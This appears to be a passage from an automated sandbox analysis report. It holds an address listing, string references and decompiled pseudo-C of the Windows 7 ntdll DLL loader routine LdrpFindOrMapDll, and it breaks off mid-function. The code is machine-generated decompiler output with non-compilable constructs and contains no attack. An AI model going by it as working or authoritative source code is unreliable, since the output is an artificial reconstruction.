                                                0x0091c2eb
                                                0x0091c2ee
                                                0x0091c2f1
                                                0x0091c2f3
                                                0x0091c2f6
                                                0x00000000
                                                0x00000000
                                                0x0091c2fc
                                                0x0091c2ff
                                                0x0091c302
                                                0x0091c304
                                                0x0091c30a
                                                0x00000000
                                                0x00000000
                                                0x0091c310
                                                0x0091c318
                                                0x0091c31a
                                                0x00000000
                                                0x00000000
                                                0x0091c320
                                                0x0091c322
                                                0x0091c325
                                                0x00000000
                                                0x00000000
                                                0x0091c32b
                                                0x0091c32e
                                                0x0091c331
                                                0x0091c333
                                                0x0091c335
                                                0x0091c37b
                                                0x0091c383
                                                0x0091c386
                                                0x0091c388
                                                0x0091c38a
                                                0x0091c38c
                                                0x0091c38f
                                                0x0091c391
                                                0x0091c391
                                                0x0091c394
                                                0x00000000
                                                0x00000000
                                                0x00953c35
                                                0x00953c39
                                                0x00953c3b
                                                0x00953c3e
                                                0x00953c41
                                                0x00000000
                                                0x00000000
                                                0x00953c4a
                                                0x00953c4d
                                                0x00953c4f
                                                0x00953c51
                                                0x00000000
                                                0x00000000
                                                0x00953c5c
                                                0x00953c5f
                                                0x00000000
                                                0x00000000
                                                0x00953c68
                                                0x00953c6d
                                                0x00953c6e
                                                0x00953c6e
                                                0x0091c39a
                                                0x0091c39d
                                                0x0091c39f
                                                0x0091c3a4
                                                0x0091c3a4
                                                0x0091c3a4
                                                0x0091c3a9
                                                0x0091c3ac
                                                0x0091c3b1
                                                0x00953dae
                                                0x00953dae
                                                0x00000000
                                                0x0091c3b7
                                                0x0091c3b7
                                                0x0091c3ba
                                                0x0091c3bc
                                                0x00953c76
                                                0x00953c7a
                                                0x00953c7f
                                                0x00953c81
                                                0x00953c8d
                                                0x0091c3cb
                                                0x0091c3cd
                                                0x0091c3d4
                                                0x0091c3d8
                                                0x0091c3da
                                                0x0091c445
                                                0x0091c445
                                                0x0091c449
                                                0x0091c44d
                                                0x00953caa
                                                0x00953cad
                                                0x00953cb0
                                                0x00953cb8
                                                0x00953cbe
                                                0x00953cc5
                                                0x00953cc9
                                                0x00953cce
                                                0x00000000
                                                0x00000000
                                                0x00953cd7
                                                0x00953cd9
                                                0x00953ce0
                                                0x00953ce7
                                                0x00953cec
                                                0x00953cee
                                                0x00000000
                                                0x00000000
                                                0x00953cf0
                                                0x00953cfd
                                                0x00953d05
                                                0x00953d0d
                                                0x00953d11
                                                0x00953d20
                                                0x00953d24
                                                0x00953d27
                                                0x00953d29
                                                0x00953d2c
                                                0x00953d2f
                                                0x00953d36
                                                0x00953d39
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00953d3f
                                                0x00953cdb
                                                0x00953cde
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00953cde
                                                0x00000000
                                                0x00953caa
                                                0x0091c453
                                                0x0091c456
                                                0x0091c458
                                                0x0091c45b
                                                0x0091c45d
                                                0x0091c4e4
                                                0x0091c4e7
                                                0x0091c4ea
                                                0x00953dce
                                                0x00953dd3
                                                0x00953dda
                                                0x00953ddc
                                                0x00953dde
                                                0x00000000
                                                0x00000000
                                                0x00953de6
                                                0x00953ded
                                                0x00953df0
                                                0x00953df5
                                                0x00000000
                                                0x00000000
                                                0x00953df7
                                                0x00953dfa
                                                0x00953dfc
                                                0x00953e03
                                                0x00953e07
                                                0x00953e0c
                                                0x00953e0e
                                                0x00000000
                                                0x00000000
                                                0x00953e14
                                                0x00953e23
                                                0x00953e2a
                                                0x00953e32
                                                0x00953e36
                                                0x00953e43
                                                0x00953e4f
                                                0x00953e51
                                                0x00000000
                                                0x00953e51
                                                0x00953dfe
                                                0x00953e01
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00953e01
                                                0x0091c4f0
                                                0x0091c4f0
                                                0x0091c4f3
                                                0x0091c4f5
                                                0x00953e5a
                                                0x00953e5a
                                                0x00000000
                                                0x0091c4f5
                                                0x0091c463
                                                0x0091c465
                                                0x00953d58
                                                0x00953d5a
                                                0x00953d5c
                                                0x00953d98
                                                0x00953da6
                                                0x00000000
                                                0x00953da6
                                                0x00953d5e
                                                0x00953d64
                                                0x00000000
                                                0x00000000
                                                0x00953d6a
                                                0x00953d6f
                                                0x00953d74
                                                0x00953d74
                                                0x00953d79
                                                0x00953d7e
                                                0x00953d83
                                                0x00000000
                                                0x00953d83
                                                0x0091c46b
                                                0x0091c46b
                                                0x0091c46f
                                                0x0091c471
                                                0x0091c477
                                                0x00000000
                                                0x00000000
                                                0x0091c480
                                                0x0091c484
                                                0x0091c489
                                                0x00000000
                                                0x00000000
                                                0x0091c48f
                                                0x0091c492
                                                0x0091c494
                                                0x00953db8
                                                0x00953dbc
                                                0x00953dc1
                                                0x00953dc3
                                                0x0091c4a3
                                                0x0091c4b2
                                                0x0091c4b9
                                                0x0091c4c1
                                                0x0091c4c5
                                                0x0091c4d2
                                                0x0091c4db
                                                0x0091c4de
                                                0x0091c4de
                                                0x0091c4e0
                                                0x00000000
                                                0x0091c4e0
                                                0x00000000
                                                0x00953dc9
                                                0x0091c49a
                                                0x0091c49d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0091c49d
                                                0x0091c3de
                                                0x0091c3e4
                                                0x0091c3e7
                                                0x0091c3ec
                                                0x00000000
                                                0x00000000
                                                0x0091c3f2
                                                0x0091c3f4
                                                0x00953c95
                                                0x00953c99
                                                0x00953c9e
                                                0x00953ca0
                                                0x00000000
                                                0x00000000
                                                0x00953ca2
                                                0x0091c403
                                                0x0091c405
                                                0x0091c418
                                                0x0091c420
                                                0x0091c426
                                                0x0091c42d
                                                0x0091c434
                                                0x0091c43a
                                                0x0091c43f
                                                0x0091c43f
                                                0x0091c441
                                                0x00000000
                                                0x0091c441
                                                0x0091c3fa
                                                0x0091c3fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0091c3fd
                                                0x00953c83
                                                0x00953c83
                                                0x00000000
                                                0x00953c83
                                                0x0091c3c2
                                                0x0091c3c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0091c3c5
                                                0x0091c3b1
                                                0x0091c337
                                                0x0091c339
                                                0x0091c33c
                                                0x0091c33e
                                                0x00953bce
                                                0x00953bd3
                                                0x00953be7
                                                0x00000000
                                                0x00953bec
                                                0x0091c344
                                                0x0091c348
                                                0x0092c1a5
                                                0x0092c1a9
                                                0x00953c08
                                                0x00953c0d
                                                0x00000000
                                                0x00953c0d
                                                0x0092c1b1
                                                0x0092c1b1
                                                0x0091c34e
                                                0x0091c352
                                                0x0093431f
                                                0x0093431f
                                                0x0091c371
                                                0x0091c373
                                                0x0091c375
                                                0x00953c17
                                                0x00953c1d
                                                0x00953c23
                                                0x00953c27
                                                0x00953c2d
                                                0x00953c2d
                                                0x00953c27
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0091c375
                                                0x008ff46f
                                                0x00953bc0
                                                0x00953bc0
                                                0x00000000

                                                Strings
                                                • sxsisol_SearchActCtxForDllName, xrefs: 00953BCE
                                                • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00953BDF
                                                • Internal error check failed, xrefs: 00953D79
                                                • Status != STATUS_NOT_FOUND, xrefs: 00953D6A
                                                • @, xrefs: 008FF3FE
                                                • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 00953D74
                                                • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00953C08
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                • API String ID: 0-4103935307
                                                • Opcode ID: 019d888707a66613dff1845324970c430508fae5e3bba0d17dfddd3af4e43364
                                                • Instruction ID: a8314c8d13873c8910f8abf138985a206496c40fbef265ffd36a99b0b60fef3b
                                                • Opcode Fuzzy Hash: 019d888707a66613dff1845324970c430508fae5e3bba0d17dfddd3af4e43364
                                                • Instruction Fuzzy Hash: 09028070A00219DBDB24CFA9C881AFEB7F4FF58704F20842DE996EB291E7749945CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0090E6C1, Relevance: 8.1, Strings: 6, Instructions: 626COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0090E6C1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t254;
				signed int _t257;
				signed int _t258;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t288;
				signed int _t290;
				signed int _t299;
				intOrPtr _t300;
				intOrPtr _t303;
				intOrPtr _t304;
				intOrPtr* _t319;
				intOrPtr* _t320;
				intOrPtr* _t321;
				intOrPtr _t324;
				signed int _t328;
				intOrPtr _t331;
				intOrPtr* _t332;
				signed short _t333;
				signed int _t336;
				intOrPtr _t347;
				signed int _t348;
				intOrPtr _t355;
				signed int _t376;
				signed int _t378;
				signed int _t380;
				signed short* _t388;
				signed short* _t390;
				signed int _t391;
				signed int _t401;
				intOrPtr _t403;
				intOrPtr* _t405;
				signed int _t406;
				intOrPtr _t407;
				signed int _t410;
				signed int _t411;
				intOrPtr* _t414;
				intOrPtr* _t416;
				signed int _t417;
				intOrPtr* _t418;
				void* _t419;
				void* _t421;
				void* _t422;

				_push(0xb4);
				_push(0x8fbe58);
				E008FDF5C(__ebx, __edi, __esi);
				_t254 =  *0x8ff78c; // 0x8
				_t416 =  *((intOrPtr*)(_t421 + 0xc));
				if(( *0x9d77a0 & (_t254 | 0x00000001)) != 0) {
					_push(_t416);
					E0096F970(__ebx, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0xe7, "LdrpFindOrMapDll", 3, "DLL name: %wZ DLL path: %wZ\n",  *(_t421 + 8));
					_t422 = _t422 + 0x1c;
				}
				_t257 =  *0x9d77a0; // 0x0
				if(( *0x8ff790 & _t257) != 0) {
					asm("int3");
				}
				_t410 = 0;
				 *(_t421 - 0x24) = 0;
				 *((intOrPtr*)(_t421 - 0x5c)) = 0;
				 *((intOrPtr*)(_t421 - 0x4c)) = 0;
				 *(_t421 - 0x28) = 0;
				 *(_t421 + 0xf) = 0;
				_t401 = 0;
				if( *(_t421 + 0x18) != 0) {
					_t258 = E008FFA50(0,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
					__eflags = _t258;
					if(_t258 != 0) {
						goto L13;
					}
					_t411 = E00911A18(_t406,  *(_t421 + 8), _t421 - 0x3c);
					__eflags = _t411;
					if(_t411 < 0) {
						goto L14;
					}
					_t411 = E00911AC6(_t402,  *(_t421 + 8), _t421 - 0x48, _t421 - 0x34);
					__eflags = _t411;
					if(_t411 < 0) {
						E008FE1C6(_t421 - 0x3c);
						goto L14;
					}
					 *(_t421 - 0x24) = 0x10000000;
					goto L84;
				} else {
					_t388 =  *(_t421 + 8);
					_t402 = _t388[2];
					_t390 = ( *_t388 & 0x0000ffff) + _t402 - 2;
					while(_t390 >= _t402) {
						_t406 =  *_t390 & 0x0000ffff;
						if(_t406 == 0x5c || _t406 == 0x2f) {
							 *(_t421 + 0xf) = 1;
							break;
						} else {
							_t390 = _t390;
							continue;
						}
					}
					__eflags =  *(_t421 + 0xf);
					if( *(_t421 + 0xf) == 0) {
						_t391 = E008FFA50( *(_t421 + 8), _t410,  *((intOrPtr*)(_t421 + 0x1c)));
						__eflags = _t391;
						if(_t391 != 0) {
							L13:
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							__eflags = 0;
							L14:
							_t260 =  *0x8ff798; // 0x8
							_t261 = _t260 | 0x00000001;
							__eflags =  *0x9d77a0 & _t261;
							if(( *0x9d77a0 & _t261) != 0) {
								E0096F970(_t401, "d:\\w7rtm\\minkernel\\ntdll\\ldrfind.c", 0x2d9, "LdrpFindOrMapDll", 4, "Status: 0x%08lx\n", _t411);
							}
							_t263 =  *0x9d77a0; // 0x0
							__eflags =  *0x8ff79c & _t263;
							if(( *0x8ff79c & _t263) != 0) {
								asm("int3");
							}
							return E008FDFA1(_t411);
						}
						_t411 = E0090FBDF(_t410,  *(_t421 + 8), 0xf, _t421 - 0x48, _t421 - 0x34, _t421 - 0x2c);
						__eflags = _t411;
						if(_t411 < 0) {
							__eflags = _t411 - 0xc0000135;
							if(_t411 == 0xc0000135) {
								_t410 = 0;
								goto L10;
							}
							goto L14;
						}
						L19:
						_t290 = E008FE893(_t421 - 0x48, 0x90ed64, 1);
						__eflags = _t290;
						 *((char*)(_t421 + 0x10)) = _t290 & 0xffffff00 | _t290 != 0x00000000;
						_t411 = E0090BC87(_t406, _t416,  *((intOrPtr*)(_t421 - 0x2c)),  *((intOrPtr*)(_t421 - 0x44)),  *((intOrPtr*)(_t421 - 0x30)),  *((intOrPtr*)(_t421 + 0x10)), _t421 - 0x1c, _t421 - 0x54);
						_t401 = 0;
						__eflags = _t411;
						if(__eflags < 0) {
							L29:
							E008EF9F0( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0x28) - _t401;
							if( *(_t421 - 0x28) == _t401) {
								L32:
								E008FE025(_t402,  *0x9d0104, 0,  *((intOrPtr*)(_t421 - 0x30)));
								goto L14;
							}
							L30:
							E008EF9F0( *(_t421 - 0x28));
							L31:
							E008FE1C6(_t421 - 0x3c);
							goto L32;
						}
						 *(_t421 + 0x18) = _t411;
						_push(_t421 - 0x20);
						_push(0);
						_push( *((intOrPtr*)(_t421 - 0x54)));
						_push( *((intOrPtr*)(_t421 - 0x1c)));
						_push(0);
						_t411 = E008FF535(_t411, _t416, __eflags);
						__eflags = _t411;
						if(_t411 < 0) {
							L28:
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E008EFC90(0xffffffff);
							goto L29;
						}
						__eflags =  *(_t421 + 0xf);
						if( *(_t421 + 0xf) != 0) {
							_t299 = E00911603( *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t299;
							if(_t299 == 0) {
								goto L22;
							}
							 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
							_t411 = 0;
							goto L28;
						}
						L22:
						__eflags =  *0x9d00d8 - 0x2000;
						if( *0x9d00d8 == 0x2000) {
							_t402 = 0x10b;
							_t300 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *((intOrPtr*)(_t300 + 0x18)) - 0x10b;
							if( *((intOrPtr*)(_t300 + 0x18)) != 0x10b) {
								goto L23;
							}
							__eflags =  *((intOrPtr*)(_t300 + 0x38)) - 0x1000;
							if( *((intOrPtr*)(_t300 + 0x38)) != 0x1000) {
								goto L23;
							}
							_push(_t401);
							_push(0x30);
							_push(_t421 - 0xc4);
							_push(1);
							E008F0060( *((intOrPtr*)(_t421 - 0x2c)));
							__eflags =  *(_t421 - 0xa1) & 0x00000008;
							if(__eflags == 0) {
								goto L23;
							}
							 *(_t421 - 4) = _t401;
							_t411 = E00975F1D(0x10b, _t406, __eflags, _t421 - 0x34,  *((intOrPtr*)(_t421 - 0x20)),  *((intOrPtr*)(_t421 - 0x1c)));
							 *(_t421 - 0x70) = _t411;
							 *(_t421 - 4) = 0xfffffffe;
							__eflags = _t411 - _t401;
							if(_t411 >= _t401) {
								goto L23;
							} else {
								goto L28;
							}
						}
						L23:
						_t417 = E008FF5E6( *((intOrPtr*)(_t421 - 0x1c)), 1, 0xe, _t421 - 0x8c);
						 *(_t421 - 0x58) = _t417;
						__eflags = _t417 - _t401;
						if(_t417 != _t401) {
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) == 0) {
								goto L24;
							}
							_t380 = E0092855C(_t401, _t411, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							_t411 = _t380;
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							} else {
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x01400000;
								 *(_t421 + 0x18) = _t380;
								goto L24;
							}
							L73:
							_t336 =  *(_t421 - 0x58);
							__eflags =  *(_t336 + 0x10) & 0x00000001;
							if(( *(_t336 + 0x10) & 0x00000001) != 0) {
								L45:
								_t411 = 0;
								E0090EF95(_t418, 1, 0);
								E008EF9F0( *((intOrPtr*)(_t421 - 0x2c)));
								__eflags =  *(_t421 - 0x28);
								if( *(_t421 - 0x28) != 0) {
									E008EF9F0( *(_t421 - 0x28));
									E008FE1C6(_t421 - 0x3c);
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t421 + 0x1c)))) = _t418;
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 1;
								goto L14;
							}
							_t411 = E0092855C(_t401, _t414, _t421 - 0x1c,  *((intOrPtr*)(_t421 - 0x30)));
							__eflags = _t411;
							if(_t411 < 0) {
								E008FE025(_t402,  *0x9d0104, 0, _t418);
								_t401 = 0;
								__eflags = 0;
								L121:
								__eflags =  *(_t421 - 0x24) & 0x00400000;
								if(__eflags != 0) {
									E00970010(_t401, _t411, _t418, __eflags,  *((intOrPtr*)(_t421 - 0x1c)));
								}
								goto L28;
							}
							 *(_t418 + 0x34) =  *(_t418 + 0x34) | 0x00000004;
							goto L45;
						}
						L24:
						__eflags =  *(_t421 + 0x18) - 0x4000000e;
						if(__eflags != 0) {
							__eflags =  *(_t421 + 0x14) & 0x00800000;
							if(( *(_t421 + 0x14) & 0x00800000) == 0) {
								L117:
								_t303 =  *((intOrPtr*)(_t421 - 0x20));
								L33:
								_t402 = 0x2000;
								__eflags =  *(_t303 + 0x16) & 0x00002000;
								if(( *(_t303 + 0x16) & 0x00002000) == 0) {
									L35:
									_t304 =  *0x9d0058; // 0x0
									_t418 = E008FE0C6( *0x9d0104, _t304 + 0x40000, 0x78);
									__eflags = _t418 - _t401;
									if(_t418 == _t401) {
										_t411 = 0xc0000017;
										goto L121;
									} else {
										 *((intOrPtr*)(_t418 + 0x18)) =  *((intOrPtr*)(_t421 - 0x1c));
										__eflags =  *(_t421 - 0x24) & 0x00000004;
										if(( *(_t421 - 0x24) & 0x00000004) == 0) {
											 *(_t418 + 0x1c) = _t401;
										} else {
											_t347 =  *((intOrPtr*)(_t421 - 0x20));
											__eflags =  *((intOrPtr*)(_t347 + 0x28)) - _t401;
											if( *((intOrPtr*)(_t347 + 0x28)) == _t401) {
												_t348 = 0;
											} else {
												_t348 =  *((intOrPtr*)(_t347 + 0x28)) +  *((intOrPtr*)(_t421 - 0x1c));
												__eflags = _t348;
											}
											 *(_t418 + 0x1c) = _t348;
										}
										 *((intOrPtr*)(_t418 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 0x50));
										 *((intOrPtr*)(_t418 + 0x24)) =  *(_t421 - 0x34);
										 *((intOrPtr*)(_t418 + 0x28)) =  *((intOrPtr*)(_t421 - 0x30));
										_t91 = _t418 + 0x2c; // 0x2c
										_t401 = _t91;
										 *_t401 =  *((intOrPtr*)(_t421 - 0x48));
										 *((intOrPtr*)(_t401 + 4)) =  *((intOrPtr*)(_t421 - 0x44));
										 *(_t418 + 0x34) =  *(_t421 - 0x24);
										 *((short*)(_t418 + 0x38)) = 0;
										 *((short*)(_t418 + 0x3a)) = 0;
										 *((intOrPtr*)(_t418 + 0x44)) =  *((intOrPtr*)( *((intOrPtr*)(_t421 - 0x20)) + 8));
										__eflags = 0;
										 *((intOrPtr*)(_t418 + 0x48)) = 0;
										 *((intOrPtr*)(_t418 + 0x4c)) = 0;
										_t104 = _t418 + 0x50; // 0x50
										_t319 = _t104;
										 *((intOrPtr*)(_t319 + 4)) = _t319;
										 *_t319 = _t319;
										_t106 = _t418 + 0x58; // 0x58
										_t320 = _t106;
										 *((intOrPtr*)(_t320 + 4)) = _t320;
										 *_t320 = _t320;
										_t108 = _t418 + 0x60; // 0x60
										_t321 = _t108;
										 *((intOrPtr*)(_t321 + 4)) = _t321;
										 *_t321 = _t321;
										 *((intOrPtr*)(_t418 + 0x68)) = 0;
										 *(_t418 + 0x6c) =  *( *((intOrPtr*)(_t421 - 0x20)) + 0x34);
										_t324 =  *0x7ffe0018;
										_t403 =  *0x7ffe0014;
										_t407 =  *0x7ffe001c;
										while(1) {
											__eflags = _t324 - _t407;
											if(_t324 == _t407) {
												break;
											}
											asm("pause");
											_t324 =  *0x7ffe0018;
											_t403 =  *0x7ffe0014;
											_t407 =  *0x7ffe001c;
										}
										 *((intOrPtr*)(_t418 + 0x70)) = _t403;
										 *((intOrPtr*)(_t418 + 0x74)) = _t324;
										_push(0);
										_push(4);
										_push(_t421 - 0x6c);
										_push(2);
										E008F0060( *((intOrPtr*)(_t421 - 0x2c)));
										_t328 =  *(_t421 - 0x6c);
										__eflags = _t328;
										if(_t328 != 0) {
											_t119 = _t418 + 0x6c;
											 *_t119 =  *(_t418 + 0x6c) - _t328;
											__eflags =  *_t119;
										}
										_t121 = _t418 + 0x3c; // 0x3c
										_t414 = _t121;
										_t331 = (E008FFAC1(_t401) & 0x0000001f) * 8 + " H\"w H\"w(H\"w(H\"w0H\"w0H\"w8H\"w8H\"w@H\"w@H\"wHH\"wHH\"wPH\"wPH\"wXH\"wXH\"w`H\"w`H\"w\\%O";
										_t405 =  *((intOrPtr*)(_t331 + 4));
										 *_t414 = _t331;
										 *((intOrPtr*)(_t414 + 4)) = _t405;
										 *_t405 = _t414;
										 *((intOrPtr*)(_t331 + 4)) = _t414;
										_t332 =  *0x9d0210; // 0x4f29c8
										 *_t418 = 0x9d020c;
										 *((intOrPtr*)(_t418 + 4)) = _t332;
										 *_t332 = _t418;
										 *0x9d0210 = _t418;
										_t128 = _t418 + 8; // 0x8
										_t333 = _t128;
										_t402 =  *0x9d0218; // 0x4f29d0
										 *_t333 = 0x9d0214;
										 *(_t333 + 4) = _t402;
										 *_t402 = _t333;
										 *0x9d0218 = _t333;
										E009104F2(_t401, _t402, _t407, _t414, 0x9d2200,  *((intOrPtr*)(_t418 + 0x18)),  *((intOrPtr*)(_t418 + 0x20)));
										E009102AC(_t402, _t418);
										__eflags =  *(_t421 - 0x58);
										if( *(_t421 - 0x58) != 0) {
											goto L73;
										} else {
											goto L45;
										}
									}
								}
								 *(_t421 - 0x24) =  *(_t421 - 0x24) | 0x00000004;
								__eflags =  *(_t421 + 0x18) - 0x40000003;
								if( *(_t421 + 0x18) == 0x40000003) {
									_t402 = _t421 - 0x34;
									_t411 = E0094A0F8(_t421 - 0x34, _t406,  *((intOrPtr*)(_t421 - 0x1c)),  *((intOrPtr*)(_t421 - 0x54)), _t303, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x10)));
									__eflags = _t411 - _t401;
									if(_t411 >= _t401) {
										goto L35;
									}
									goto L28;
								}
								goto L35;
							}
							__eflags =  *(_t421 + 0x14) & 0x00000002;
							if(( *(_t421 + 0x14) & 0x00000002) != 0) {
								goto L117;
							}
							_t402 = 0x2000;
							_t303 =  *((intOrPtr*)(_t421 - 0x20));
							__eflags =  *(_t303 + 0x16) & 0x00002000;
							if(( *(_t303 + 0x16) & 0x00002000) != 0) {
								L115:
								__eflags =  *(_t303 + 0x5e) & 0x00000080;
								if(( *(_t303 + 0x5e) & 0x00000080) != 0) {
									goto L33;
								}
								_t411 = 0xc0000428;
								goto L28;
							}
							__eflags = _t417 - _t401;
							if(_t417 == _t401) {
								goto L33;
							}
							__eflags =  *(_t417 + 0x10) & 0x00000001;
							if(( *(_t417 + 0x10) & 0x00000001) != 0) {
								goto L33;
							}
							goto L115;
						}
						_push(_t421 - 0x68);
						_push(_t401);
						_push(_t401);
						_push( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 8)));
						_push(3);
						E008FF535(0x4000000e, _t417, __eflags);
						_t355 =  *((intOrPtr*)(_t421 - 0x68));
						__eflags =  *((short*)(_t355 + 0x48)) - 3;
						if( *((short*)(_t355 + 0x48)) <= 3) {
							 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
							_push(_t421 - 0x50);
							_push(2);
							_push(_t421 - 0x40);
							_push(1);
							_push(1);
							_t411 = E008F1614(0x4000000e);
							__eflags = _t411 - _t401;
							if(_t411 < _t401) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t421 - 0x50)) - 3;
							if( *((intOrPtr*)(_t421 - 0x50)) != 3) {
								goto L35;
							}
							__eflags =  *0x9d0001;
							if( *0x9d0001 != 0) {
								 *0x9d9240 =  *0x9d9240 + 1;
							}
							L27:
							_t411 = 0xc000007b;
							goto L28;
						}
						__eflags =  *((intOrPtr*)(_t421 - 0x5c)) - _t401;
						if( *((intOrPtr*)(_t421 - 0x5c)) != _t401) {
							_push( *((intOrPtr*)(_t421 - 0x1c)));
							E008EFC90(0xffffffff);
							E008EF9F0( *((intOrPtr*)(_t421 - 0x2c)));
							E008EF9F0( *(_t421 - 0x28));
							E008FE1C6(_t421 - 0x3c);
							_t410 = 0;
							E008FE025(_t402,  *0x9d0104, 0,  *((intOrPtr*)(_t421 - 0x30)));
							_t401 = 1;
							L11:
							_t419 = E008FE825( *(_t421 + 8));
							__eflags = _t419 - 2;
							if(_t419 != 2) {
								L54:
								_t411 = E00911C26(_t402, _t406,  *(_t421 + 8), _t419, _t421 - 0x60,  *((intOrPtr*)(_t421 - 0x4c)), _t421 - 0x48, _t421 - 0x34, _t421 - 0x3c);
								__eflags = _t411;
								if(_t411 < 0) {
									__eflags = _t411 - 0xc0000135;
									if(_t411 == 0xc0000135) {
										__eflags = _t401;
										if(_t401 != 0) {
											_t411 = 0xc000007b;
										} else {
											E00927CC4( *(_t421 + 8));
											E00912D04(0xc0000135,  *(_t421 + 8), 0);
										}
									}
									goto L14;
								}
								__eflags =  *(_t421 + 0xf);
								if( *(_t421 + 0xf) == 0) {
									L84:
									 *((intOrPtr*)(_t421 - 0x88)) = 0x18;
									_t416 = 0;
									 *((intOrPtr*)(_t421 - 0x84)) = 0;
									0x840 = 0x40;
									__eflags =  *0x9d924c;
									if( *0x9d924c == 0) {
									}
									 *((intOrPtr*)(_t421 - 0x7c)) = 0x840;
									 *((intOrPtr*)(_t421 - 0x80)) = _t421 - 0x3c;
									 *((intOrPtr*)(_t421 - 0x78)) = _t416;
									 *((intOrPtr*)(_t421 - 0x74)) = _t416;
									_push(0x60);
									_push(5);
									_push(_t421 - 0x94);
									_push(_t421 - 0x88);
									_push(0x100021);
									_t411 = E008EFD74(_t421 - 0x28);
									__eflags = _t411 - _t416;
									if(_t411 < _t416) {
										__eflags = _t411 - 0xc0000034;
										if(_t411 == 0xc0000034) {
											L88:
											_t411 = 0xc0000135;
											goto L31;
										}
										__eflags = _t411 - 0xc000003a;
										if(_t411 != 0xc000003a) {
											goto L31;
										}
										goto L88;
									} else {
										_push( *(_t421 - 0x28));
										_push(0x1000000);
										_push(0x10);
										_push(_t416);
										_push(_t416);
										_push(0xf);
										_t411 = E008EFFB4(_t421 - 0x2c);
										__eflags = _t411 - _t416;
										if(_t411 < _t416) {
											__eflags = _t411 - 0xc0000017;
											if(_t411 != 0xc0000017) {
												__eflags = _t411 - 0xc000009a;
												if(_t411 != 0xc000009a) {
													__eflags = _t411 - 0xc000012d;
													if(_t411 != 0xc000012d) {
														 *((intOrPtr*)(_t421 - 0x40)) = _t421 - 0x34;
														_push(_t421 - 0x50);
														_push(1);
														_push(_t421 - 0x40);
														_push(1);
														_push(1);
														_t288 = E008F1614(0xc000007b);
														__eflags = _t288;
														if(_t288 >= 0) {
															__eflags =  *0x9d0001;
															if( *0x9d0001 != 0) {
																 *0x9d9240 =  *0x9d9240 + 1;
															}
														}
													}
												}
											}
											goto L30;
										}
										__eflags =  *(_t421 + 0x14) & 0x00001000;
										if(( *(_t421 + 0x14) & 0x00001000) != 0) {
											goto L19;
										}
										_t411 = E00911D44(_t402, _t421 - 0x3c,  *(_t421 - 0x28));
										__eflags = _t411;
										if(_t411 >= 0) {
											goto L19;
										}
										__eflags = _t411 - 0xc0000225;
										if(_t411 == 0xc0000225) {
											goto L19;
										} else {
											_t401 = 0;
											goto L29;
										}
										goto L54;
									}
								}
								__eflags = _t419 - 2;
								if(_t419 == 2) {
									goto L84;
								}
								_t376 = E008FFA50(_t421 - 0x48, _t421 - 0x34,  *((intOrPtr*)(_t421 + 0x1c)));
								__eflags = _t376;
								if(_t376 == 0) {
									goto L84;
								}
								 *((char*)( *((intOrPtr*)(_t421 + 0x20)))) = 0;
								_t411 = 0;
								goto L31;
							}
							_t378 = E008FFA50(_t410,  *(_t421 + 8),  *((intOrPtr*)(_t421 + 0x1c)));
							__eflags = _t378;
							if(_t378 == 0) {
								goto L54;
							}
							goto L13;
						}
						goto L27;
					}
					L10:
